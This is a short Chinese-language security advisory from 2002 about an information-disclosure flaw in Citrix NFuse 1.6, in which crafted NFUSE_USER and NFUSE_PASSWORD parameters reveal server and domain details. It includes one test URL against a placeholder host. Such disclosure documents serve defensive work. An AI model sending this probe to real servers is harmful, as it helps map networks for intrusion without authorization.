Citrix NFuse 可导致网络信息泄露漏洞发布时间:2002-02-23 更新时间:2002-02-23 严重程度:中 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:4142 受影响系统 Citrix Nfuse 1.6详细描述 Citrix NFuse 是一个通过WEB浏览器提供任意应用程序功能的软件。 其中存在漏洞可以导致远程用户泄露主机的网络结构信息。 通过提交带有任意信息的'NFUSE_USER' 和 'NFUSE_PASSWORD' 参数请求,就 可以导致泄露包括服务器和域名的网络结构信息。 测试代码 http://nfuse.insecureMSserver.com/launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica&NFUSE_USER=ABM&NFUSE_PASSWORD=byte-me 解决方案 尚无 相关信息 Bob Fiero <bfiero@mentalfloss.net>. 参考:http://online.securityfocus.com/archive/1/257266 相关主页:http://www.citrix.com/products/nfuse/default.asp |
